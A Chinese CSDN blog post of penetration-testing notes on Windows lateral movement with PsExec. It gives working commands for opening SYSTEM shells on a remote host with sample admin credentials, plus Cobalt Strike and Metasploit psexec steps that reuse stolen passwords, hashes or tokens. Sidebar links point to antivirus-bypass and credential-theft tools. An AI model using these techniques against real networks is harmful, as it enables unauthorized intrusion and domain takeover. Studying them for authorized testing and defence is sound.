【渗透测试笔记】之【内网渗透——横向移动:PsExec的使用】

最新推荐文章于 2022-09-02 09:18:05 发布
最新推荐文章于 2022-09-02 09:18:05 发布
阅读量7.3k 收藏 18
点赞数 2
分类专栏: 渗透测试 内网渗透 文章标签: 网络安全 内网渗透 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/121394678
版权

文章目录

1. PsTools工具包中的PsExec

地址:https://download.sysinternals.com/files/PSTools.zip

1.1 注意事项

  1. 需要开启默认共享
  2. 建立了IPC$不需要账号密码参数
  3. 执行过程中目标系统会创建psexec服务,命令执行后会删除。但是会产生日志文件。

1.2 使用方法

1.2.1 获得交互式shell

.\PsExec.exe -accepteula \\10.1.1.2 -s cmd.exe
# 已建立IPC$的情况
# -accepteula:第一次运行不弹出确认框
# -s:system权限运行

.\PsExec.exe -accepteula \\10.1.1.2 -u administrator -p 123.com -s cmd.exe
# 未建立IPC$的情况

在这里插入图片描述

1.2.2 执行单条命令并回显

.\PsExec.exe -accepteula \\10.1.1.2 -s cmd.exe /c "whoami"
# 同理,已经建立IPC$

在这里插入图片描述

2. CS中的PsExec

2.1 查看目标所在网段其它主机

  1. 扫描主机
    在这里插入图片描述
    在这里插入图片描述

  2. 列出主机
    在这里插入图片描述
    在这里插入图片描述

2.2 使用PsExec横向移动

  1. 右键要横向的目标主机,选择psexec的版本(32位64位或PowerShell)。
    在这里插入图片描述
  2. 选择已经获得的凭据(明文、散列值、令牌都可以)、回连的listener、进行横向的session。
    在这里插入图片描述
  3. 点击Launch,即会返回一个DC-1的session。 在这里插入图片描述
    在这里插入图片描述

3. msf中的PsExec

3.1 添加路由

在这里插入图片描述

3.2 加载模块,设置目标IP、账号、密码及设置payload

use exploit/windows/smb/psexec
set rhosts 10.1.1.2
set smbuser administrator
set smbpass 1234567.com

这里就使用默认payload。
run。
在这里插入图片描述
成功获得DC-1的session:
在这里插入图片描述

AA8j
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透(四十一)之横向移动篇-PsExec工具远程命令执行横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 423
psexec 是 windows 下非常好的一款远程命令行工具。psexec使用不需要对方主机开方3389端口,只需要对方开启admin共享和ipc共享和ipc共享和ipc(该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中psExec下载。
CheeseTools:自行开发的横向移动代码执行工具
08-05
Cheese工具 这个存储库是基于已经存在的,非常发布它们并给我正确的动力来处理它们。 CheeseExec 通过类似 PsExec 的功能命令执行 / 横向移动。 必须在特权用户的上下文中运行。 该工具基于 CsExec,但旨在允许对服务创建进行额外控制,特别是: 创建(搜索服务是否存在,如果不存在,尝试创建) 启动(搜索服务是否存在并停止,如果是这种情况尝试启动它;如果没有,尝试创建它并启动它) 停止(搜索服务是否存在并正在运行,如果是这种情况尝试停止它) 删除(搜索服务是否存在并正在运行,如果是这种情况,则尝试停止它而不是删除它,否则将其删除) CheeseExec.exe <targetMachine> <serviceName> <binPath> <action> 另请参阅 。 奶酪PS Cheese PS 是命令执行/横向移动框架。 它依赖System.Mana
WMIHACKER:绕过防病毒软件横向移动命令执行工具
03-18
WMIHACKER(不需要445端口) 联系人︰_xiangshan(微信) 免责声明:本项目涉及的技术仅用于安全学习和防御目的,禁止非法使用! 绕过杀毒软件横向移动命令执行测试工具(不需要445端口) 简介:常见的WMIEXECPSEXEC工具执行命令是创建服务或调用Win32_Process.create,这些方法已被防病毒软件100%拦截,因此我们创建了WMIHACKER(绕过防病毒软件横向移动命令执行测试工具) (不需要445端口)。 主要功能:1.命令执行; 2.文件上传; 3.文件下载 如何使用 C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs __ ____ __ _____ _ _ _____ _ ________ _____ \ \
0x14.第十四课 MetaSploit探测内网存活ftp服务.pdf
06-24
0x14.第十四课 MetaSploit探测内网存活ftp服务.pdf
域渗透工具包
01-15
windows平台下的mimikatz,psexec,ms14-068 三种用来进行域渗透的工具
cs和msf实现内网横向移动2
wuxinweii的博客
10-28 689
一、使用CS的psexec实现哈希攻击 1.在扫描完内网其他主机后选择一台需要传递的主机 2.实验之前必须已经获得用户名的哈希值或明文密码 右键选择jump—>psexec功能 2.配置参数 选择一个用户名密码和参数,但必须与需要传递的主机信息一致 选择一个监听器和一个已经得到的session 3.执行命令查看结果 传递成功 上线成功 二、使用msf的psexec功能 如果cs一直无法传递,可以试试使用msf的psexec功能 1.配置进入内网路由(前面一篇文章有做法) 2.使用use exp
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5383
内网渗透测试:内网横向移动基础总结 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
内网渗透学习04——域内横向移动
box
02-24 4771
文章目录0x00 Windows系统密码和Hash获取分析和防范1. Windows 系统密码和Hash获取1.1 使用工具将散列值和明文从内存中导出。1.2 通过SAM和System文件抓取密码1.3Mimikatz 在线读取Hash和密码明文1.4 Mimikatz 离线读取Hash和密码明文1.5 Nishang2. 防范密码和Hash凭证窃取0x01 哈希传递攻击和防范0x02 IPC1. IPC 入侵2. 计划任务 at schtasksatschtasks3. impacket 工具包
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 9607
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
内网渗透-【横向移动PsExec工具远程命令执行横向移动
lza20001103的博客
09-02 1467
横向移动PsExec工具远程命令执行横向移动 文章目录【横向移动PsExec工具远程命令执行横向移动PsExec介绍 PsExec介绍 psexec 是 windows 下非常好的一款远程命令行工具。 psexec使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。 但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。 由于psexec是Windo
SharpNoPSExec:减少文件执行横向移动的命令
05-13
少执行横向移动的命令。 SharpNoPSExec将查询所有服务,并以启动类型禁用或手动,当前状态已停止以及具有LocalSystem特权重用它们,以随机方式选择一项。 一旦选择了服务,它将保存其当前状态,将二进制路径替换为...
使用System权限运行应用程序工具PsExec
01-03
解压后大小128KB的程序...本人用此来解决在VISTA下由于使用UE而导致的花屏或者蓝屏0x00000018问题,详细解决方案参考本人xchuu的163里面的blog, 地址:http://xchuu.blog.163.com/blog/static/2020791120100310495384/
PAExec:远程执行,如PsExec
04-29
PAExec是免费的,可重新分发的开源软件,等效于Microsoft流行的PsExec应用程序: 文献资料 PAExec主页显示所有命令行选项。 执照 基本上,任何人都可以将该软件用于私人,公共或商业用途,包括将其用作分布式商业...
PsExec64.zip
07-04
....使用PsExec64.exe提升cmd权限 1. 将PsExec64复制到服务器 2. 运行cmd命令: PsExec64.exe /s cmd 如果不成功,则执行下条命令 PsExec64.exe \\127.0.0.1 -u 服务器用户名 -p 服务器密码 /s cmd
使用Powershell在多线程中运行PSexec
04-07
本技巧说明了如何在多个并行服务器中执行单个命令。 我们可以使用其他工具来实现相同的目的。
Psexec使用方式
bring_coco的博客
07-18 4196
Psexec使用方式
横向移动psexec使用
yy
11-12 4106
psexec是 windows 下非常好的一款远程命令行工具。psexec使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙默认禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单.
横向渗透之PsExec工具使用
qq_46258964的博客
04-16 3574
psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限 PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程, 并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 PsExec的基本原理是: 通过管道在远程目标机器上创建一个psexec服务, 并在本地磁盘中生成一个名为PSEXESVC的二进制文件, 然后通过psexec服务运行命令,运行结束后删除任务。 利用条件 445端口开放, 知道目标账号密码 PsExec下载地址 优点:可以躲避检测无视杀毒软件
win10 PSexec正确使用方法
如鹿渴慕泉水的专栏
03-09 1571
在目标机 reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f gpupdate /force ![aaa](https://img-blog.csdnimg.cn/20210309195756465.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naG
cobalt strike横向移动
最新发布
08-19
C知道:对于Cobalt Strike的横向移动,可以通过以下几种方法实现: 1. 密码猜测和弱口令攻击:使用Cobalt Strike的Beacon模块,可以尝试猜测目标系统的密码或者利用已知的弱口令进行攻击。 2. 漏洞利用:Cobalt Strike集成了多个漏洞利用模块,可以通过针对目标系统的漏洞进行攻击,获取系统权限。 3. 借助已有权限:如果已经获取了某个系统的权限,可以使用Cobalt Strike的post-exploitation功能,通过横向移动命令(如psexec、wmic等)在网络中传播。 4. 社会工程学攻击:Cobalt Strike也可以通过发送钓鱼邮件或者利用其他社会工程学手段,诱使目标用户点击恶意链接或者打开恶意文件,从而在目标系统中植入Beacon。 需要注意的是,横向移动是一项高风险的活动,需要谨慎操作,并且遵守法律法规。在合法授权的情况下使用Cobalt Strike进行安全测试是被允许的,但在未经授权的情况下使用是违法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值